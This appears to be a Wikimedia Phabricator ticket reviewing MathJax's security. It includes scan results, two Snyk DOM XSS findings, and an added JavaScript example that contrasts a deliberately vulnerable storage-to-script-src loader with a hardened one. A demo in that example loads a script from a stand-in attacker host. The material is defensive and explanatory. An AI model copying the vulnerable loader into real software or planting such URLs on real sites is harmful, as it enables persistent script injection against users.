
Application Security Review Request: MathJax
Closed, ResolvedPublic

Description

Project Information

───────────────────────────────────────────────────────────────────────────────
Language                 Files     Lines   Blanks  Comments     Code Complexity
───────────────────────────────────────────────────────────────────────────────
JavaScript                  69       267        0       192       75         98
JSON                        17      1839       13         0     1826          0
Markdown                     4       625      152         0      473          0
YAML                         2        19        0         0       19          0
License                      1       202       33         0      169          0
gitignore                    1         2        1         0        1          0
───────────────────────────────────────────────────────────────────────────────
Total                       94      2954      199       192     2563         98
───────────────────────────────────────────────────────────────────────────────
Estimated Cost to Develop (organic) $72,574
Estimated Schedule Effort (organic) 5.08 months
Estimated People Required (organic) 1.27
───────────────────────────────────────────────────────────────────────────────
Processed 23817658 bytes, 23.818 megabytes (SI)
───────────────────────────────────────────────────────────────────────────────

To use MathJax from the client, users need access to the MathJax JS source code.

This can either be done by referring to existing CDNs, which seems not to be an option for Wikimedia, or WMF and self-hosted wikis would need to host their own copies of MathJax, as is already done in the context of the WDQS. We have also been using MathJax on the server side via npm: https://www.npmjs.com/package/mathoid-mathjax

For more context, see T310211

Event Timeline

Physikerwelt renamed this task from Security review for MathJax to Application Security Review Request: MathJax. Dec 31 2023, 4:49 PM
Physikerwelt updated the task description.
Physikerwelt updated the task description.
Physikerwelt updated the task description.

Change 987131 had a related patch set uploaded (by Physikerwelt; author: Physikerwelt):

[mediawiki/extensions/Math@master] Add MathJax rendering option

https://gerrit.wikimedia.org/r/987131

@mmartorana do you need https://gerrit.wikimedia.org/r/c/987131 to do the security review? If not, I would abandon the change and start over with the method suggested by @Jdforrester-WMF which I was not aware of when I created the patch.

@Physikerwelt - feel free to use the method suggested by @Jdforrester-WMF.

@mmartorana Thank you. That was easier than expected. Do you have an estimate of how long the review might take?

MSantos triaged this task as High priority. Mar 14 2024, 8:44 PM
MSantos added subscribers: sbassett, MSantos.

With the QA review completion T353000#9623043, this is the next priority on our side in order to be successful with RESTBase Sunsetting for Mathoid. @mmartorana and @sbassett please let us know what would be the required next steps.

Hi @MSantos and @Physikerwelt - I'm in the process of conducting the review, and it will be completed by the end of March.

Please inform us if there's anything else you require.

Security Review Summary - T354136 - 2024-03-29
Last tag reviewed: v3.2.2

Summary

Upon reviewing the vendor code, it appears generally satisfactory from a security perspective. While there are some findings from SAST, they should not pose significant risks. Additionally, there are only a few vulnerabilities such as CVEs or advisories, related to older versions of this extension. Considering also the overall support for this project, I would assess the risk level as low.

MathJax

General Security Information

Statistic/Info                                                Value                                    Risk
Repository                                                    https://github.com/mathjax/MathJax       none
Repository                                                    https://github.com/mathjax/MathJax-src   none
Relevant tag/branch                                           v3.2.2                                   none
Last commit reviewed (if relevant)                            ad8f5c21                                 none
Recent contributions to code (6 months) (pull request merge)  61                                       low
Active developers with > 10 commits                           3                                        low
Current overall usage                                         10k stars                                low
Current open security issues                                  0                                        none
Methods for reporting security issues                         No security policies                     medium

Vulnerable Packages
Risk: none

npm audit returned no results. low risk
snyk returned no results. low risk
osv-detector returned no results. low risk
sast-scan returned no results. low risk

Outdated Packages
Risk: none
As reported via npm outdated:
(no explicit vulnerabilities reported, simply noting for completeness' sake.)

Package                Current   Wanted   Latest        Depended By
@babel/core            7.17.12   7.24.3   7.24.3        MathJax-src
@babel/preset-env      7.17.12   7.24.3   7.24.3        MathJax-src
babel-loader           8.2.5     8.3.0    9.1.3         MathJax-src
diff                   5.0.0     5.2.0    5.2.0         MathJax-src
mhchemparser           4.1.1     4.2.1    4.2.1         MathJax-src
mj-context-menu        0.6.1     0.6.1    0.9.1         MathJax-src
rimraf                 3.0.2     3.0.2    5.0.5         MathJax-src
speech-rule-engine     4.0.6     4.0.7    4.1.0-beta.8  MathJax-src
tape                   5.5.3     5.7.5    5.7.5         MathJax-src
terser-webpack-plugin  5.3.1     5.3.10   5.3.10        MathJax-src
typescript             4.6.4     4.9.5    5.4.3         MathJax-src
webpack                5.72.1    5.91.0   5.91.0        MathJax-src
webpack-cli            4.9.2     4.10.0   5.1.4         MathJax-src

Scorecard score
5 / 10 low
(see raw output: P59004)

Static Analysis Findings
sast-scan returned no results.
semgrep with various rules: P59005
bearer with various rules: P59008
horusec returned these findings: P59010
snyk returned these two findings:

✗ [Medium] Cross-site Scripting (XSS) 
  Path: ts/components/latest.ts, line 247 
  Info: Unsanitized input from browser storage flows into a 'src' script element attribute, where it is used to dynamically construct the HTML page on client side. This may result in a DOM Based Cross-Site Scripting attack (DOMXSS).

✗ [Medium] Cross-site Scripting (XSS) 
  Path: ts/components/latest.ts, line 253 
  Info: Unsanitized input from browser storage flows into appendChild, where it is used to dynamically construct the HTML page on client side. This may result in a DOM Based Cross-Site Scripting attack (DOMXSS).

General Security Issues
gitleaks and whispers returned no results. low risk
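The two Snyk findings in the review above describe one sink class: a value read from browser storage ends up in a script `src` attribute and in `appendChild`. The block below is an added example, not MathJax's `ts/components/latest.ts` code, that puts that vulnerable loader pattern next to a hardened one which parses the stored value as structured data, validates the version and origin against a fixed shape and allowlist, and builds the URL only from the validated parts. The `document` and `localStorage` stand-ins, the storage key `mathjax-latest`, the allowed origin `https://cdn.example.org` and the script path are all constructed for this illustration so it runs under Node.

```javascript
// Added example (not MathJax code): the DOM XSS sink class Snyk reported,
// shown as a vulnerable loader next to a hardened one. The DOM and storage
// objects below are constructed stand-ins so this runs under Node.

// Assumption: the only CDN origin we are willing to load MathJax from.
const ALLOWED_ORIGINS = ["https://cdn.example.org"];
// Plain X.Y.Z versions only: no "../", no query strings, no "javascript:".
const VERSION_RE = /^\d+\.\d+\.\d+$/;
const STORAGE_KEY = "mathjax-latest"; // hypothetical key name

// Minimal document stand-in that records what gets appended to <head>.
function makeFakeDom() {
  const appended = [];
  const document = {
    createElement: (tag) => ({ tagName: tag.toUpperCase(), src: "" }),
    head: { appendChild: (el) => { appended.push(el); return el; } },
  };
  return { document, appended };
}

// Minimal localStorage stand-in.
function makeFakeStorage(initial = {}) {
  const store = { ...initial };
  return {
    getItem: (k) => (Object.prototype.hasOwnProperty.call(store, k) ? store[k] : null),
    setItem: (k, v) => { store[k] = String(v); },
  };
}

// VULNERABLE: whatever is in storage becomes a script URL. Storage is
// same-origin data, so any earlier injection (or a buggy same-origin page)
// can plant a URL that is then executed on every later page load.
function loadLatestVulnerable(storage, document) {
  const cached = storage.getItem(STORAGE_KEY); // source: browser storage
  const script = document.createElement("script");
  script.src = cached;               // sink: script src attribute
  document.head.appendChild(script); // sink: appendChild
  return script.src;
}

// HARDENED: treat storage as untrusted input. Parse it as structured data,
// validate each field against a fixed shape / allowlist, and build the URL
// only from the validated parts. Anything else: refuse and let the caller
// fall back to the bundled copy.
function loadLatestHardened(storage, document) {
  let version = "";
  let origin = "";
  try {
    const parsed = JSON.parse(storage.getItem(STORAGE_KEY) || "null");
    if (parsed && typeof parsed === "object") {
      version = String(parsed.version);
      origin = String(parsed.origin);
    }
  } catch (_e) {
    // corrupted or non-JSON storage: fall through to the refusal below
  }
  if (!VERSION_RE.test(version) || !ALLOWED_ORIGINS.includes(origin)) {
    return null;
  }
  const script = document.createElement("script");
  // Path layout is an assumption for this example.
  script.src = `${origin}/mathjax/${version}/es5/tex-mml-chtml.js`;
  document.head.appendChild(script);
  return script.src;
}

// Stand-alone demonstration with a constructed poisoned storage value.
function demo() {
  const { document } = makeFakeDom();
  const poisoned = makeFakeStorage({ [STORAGE_KEY]: "https://attacker.example/evil.js" });
  const trusted = makeFakeStorage({
    [STORAGE_KEY]: JSON.stringify({ origin: "https://cdn.example.org", version: "3.2.2" }),
  });
  return {
    vulnerable: loadLatestVulnerable(poisoned, document),     // attacker URL loaded
    hardenedPoisoned: loadLatestHardened(poisoned, document), // null: refused
    hardenedTrusted: loadLatestHardened(trusted, document),   // validated CDN URL
  };
}
```

The point of validating on read rather than on write is that `localStorage` is shared by everything on the origin and persists across sessions, so a single earlier injection becomes a persistent loader for attacker-controlled script; checking the value against a fixed shape and an origin allowlist turns that into a refusal. In a self-hosted deployment of the kind the task description proposes, the simplest mitigation is to pin to the bundled copy and not consult a "latest" value at all, so the sink is never reachable.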

Thank you @mmartorana . @Jdforrester-WMF would you mind looking into the linked patch again, or should I search for another reviewer?

@mmartorana can you share the raw output linked here with the MathJax team or link it from this ticket.